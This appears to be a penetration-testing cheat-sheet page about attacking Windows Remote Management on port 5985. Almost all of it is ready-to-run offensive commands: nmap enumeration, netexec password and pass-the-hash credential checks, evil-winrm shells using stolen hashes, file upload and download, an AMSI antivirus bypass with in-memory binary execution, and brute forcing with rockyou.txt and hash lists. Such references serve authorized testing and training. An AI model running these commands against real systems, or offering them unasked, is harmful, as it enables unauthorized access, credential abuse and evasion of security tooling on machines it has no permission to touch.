5985 - WinRM | d4t4s3c hacks & pills

Information

Default Port: 5985

PORT     STATE SERVICE
5985/tcp open  wsman                                                                                                       

Enumeration

nmap -p5985 -sS 192.168.1.2
nmap -p5985 -sVC 192.168.1.2

Check Credentials

# password
netexec winrm 192.168.1.2 -u administrador -p Password1
netexec winrm 192.168.1.2 -u administrador -p Password1 --local-auth
# hash
netexec winrm 192.168.1.2 -u administrator -H <HASH>
netexec winrm 192.168.1.2 -u administrator -H <HASH> --local-auth

Connect

# gem install evil-winrm
evil-winrm -i 192.168.1.2 -u administrator -p Password1          # password
evil-winrm -i 192.168.1.2 -u administrator -H <HASH>             # hash

File Transfer

Evil-WinRM PS C:\Windows\Temp> upload <FILE>                     # upload
Evil-WinRM PS C:\Windows\Temp> download <FILE>                   # download

AMSI (Bypass)

Evil-WinRM PS C:\Windows\Temp> menu
Evil-WinRM PS C:\Windows\Temp> Bypass-4MSI
Evil-WinRM PS C:\Windows\Temp> Invoke-Binary /home/kali/binary.exe

Brute Force

netexec winrm 192.168.1.2 -u users.dic -p Password1               # user
netexec winrm 192.168.1.2 -u administrador -p rockyou.txt         # password
netexec winrm 192.168.1.2 -u administrador -H hashes.txt          # hash